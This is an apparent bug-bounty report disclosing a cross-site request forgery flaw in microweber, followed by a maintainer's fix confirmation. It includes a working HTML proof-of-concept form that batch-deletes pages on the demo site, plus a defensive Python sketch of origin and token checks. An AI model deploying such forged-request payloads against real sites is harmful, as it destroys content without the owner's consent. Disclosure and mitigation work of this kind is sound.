Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 30th 2021


✍️ Description

An attacker is able to batch-delete any website pages if they know the pages' id parameter values.

🕵️‍♂️ Proof of Concept

After opening PoC.html in Firefox or Safari and clicking the submit button (the form can also be auto-submitted), you will see that the files with ids 9 to 15 have been deleted.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/content/delete" method="POST">
      <input type="hidden" name="ids&#91;&#93;" value="on" />
      <input type="hidden" name="ids&#91;&#93;" value="9" />
      <input type="hidden" name="ids&#91;&#93;" value="10" />
      <input type="hidden" name="ids&#91;&#93;" value="11" />
      <input type="hidden" name="ids&#91;&#93;" value="12" />
      <input type="hidden" name="ids&#91;&#93;" value="13" />
      <input type="hidden" name="ids&#91;&#93;" value="14" />
      <input type="hidden" name="ids&#91;&#93;" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

An attacker can delete any page.

📍 Location

app.js#L1
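The root cause is that the delete endpoint acts on the victim's session cookie alone, so any origin can submit the form above. The following is an added illustration (not microweber's code) of the two checks that stop it: an Origin/Referer comparison and a per-session synchronizer token. The site origin, the `_token` field name and the sample requests are assumptions constructed for the example.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit
import hmac

# Assumed deployment origin of the site being protected.
SITE_ORIGIN = "https://demo.microweber.org"
# Assumed name of the per-session anti-CSRF form field.
TOKEN_FIELD = "_token"

def request_origin(headers: dict) -> Optional[str]:
    """Return scheme://host of the request source, from Origin or (fallback) Referer."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else None

def csrf_check(headers: dict, form: dict, session_token: str) -> str:
    """Return 'ok', or the reason the request must be refused."""
    if request_origin(headers) != SITE_ORIGIN:
        return "origin mismatch"  # the PoC form is submitted from the attacker's page
    token = form.get(TOKEN_FIELD, [""])[0]
    if not token or not hmac.compare_digest(token, session_token):
        return "missing or invalid csrf token"  # a foreign page cannot read the victim's token
    return "ok"

def handle_delete(headers: dict, body: str, session_token: str) -> dict:
    """Model of /api/content/delete with the CSRF checks ahead of the destructive action."""
    form = parse_qs(body)
    reason = csrf_check(headers, form, session_token)
    if reason != "ok":
        return {"status": 403, "deleted": [], "reason": reason}
    # Only numeric ids are acted on; the PoC also sends a stray "on" (a select-all checkbox value).
    ids = [int(v) for v in form.get("ids[]", []) if v.isdigit()]
    return {"status": 200, "deleted": ids, "reason": "ok"}

# Constructed sample requests; the browser attaches the victim's session cookie to both.
POC_HEADERS = {"Origin": "https://attacker.example", "Cookie": "session=victim"}
POC_BODY = "ids%5B%5D=on&ids%5B%5D=9&ids%5B%5D=10&ids%5B%5D=11"
LEGIT_HEADERS = {"Origin": SITE_ORIGIN, "Cookie": "session=victim"}
LEGIT_BODY = "_token=tok-abc123&ids%5B%5D=9&ids%5B%5D=10"

if __name__ == "__main__":
    print(handle_delete(POC_HEADERS, POC_BODY, "tok-abc123"))    # 403, nothing deleted
    print(handle_delete(LEGIT_HEADERS, LEGIT_BODY, "tok-abc123"))  # 200, deleted [9, 10]
```

The origin check alone is not sufficient when the Origin header is absent or spoofed by a non-browser client, which is why the token check is kept as the primary control.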

Occurrences

We have contacted a member of the microweber team and are waiting to hear back 4 months ago
amammad
4 months ago

Researcher


Hey microweber team, can you give me some feedback? Thanks so much.

amammad modified their report
4 months ago
amammad
4 months ago

Researcher


Hey microweber team, I just want to make sure that you see this important report too.

amammad
3 months ago

Researcher


Dear microweber team, can I ask you to validate this report too? I think that you forgot to check this report.

Best regards, Amammad.

Peter Ivanov confirmed that a fix has been merged on 76c277 3 months ago
Peter Ivanov has been awarded the fix bounty
Peter Ivanov
3 months ago

Maintainer


Issue is fixed